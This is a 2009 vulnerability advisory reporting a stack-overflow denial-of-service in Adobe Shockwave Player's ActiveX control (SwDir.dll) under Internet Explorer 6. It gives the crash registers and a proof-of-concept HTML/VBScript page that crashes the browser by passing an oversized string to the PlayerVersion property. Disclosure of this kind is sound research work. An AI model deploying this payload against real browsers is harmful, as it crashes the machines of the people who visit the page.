########################
Application: Adobe ShockWave Player (11.5.1.601)
Platforms: Windows XP Professional French SP2 and SP3
crash: IE 6.0.2900.2180
Exploitation: remote DoS
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
########################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Over 450 million Internet-enabled desktops have installed Adobe Shockwave Player.
These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment,
interactive product demonstrations, and online learning applications. Shockwave Player displays Web content that has been created by Adobe Director.
########################
============================
2) Technical details
============================
Name:SwDir.dll
Ver.:11.5.1.601
CLSID:{233C1507-6A77-46A4-9443-F871F945D258}
(d40.b20): Stack overflow - code c00000fd
eax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002
eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202
########################
===========
3) The Code
===========
Proof of concept DoS code;
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>
argCount = 1
arg1=String(2097152, "A")
ShockW.PlayerVersion = arg1
</script>
########################
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum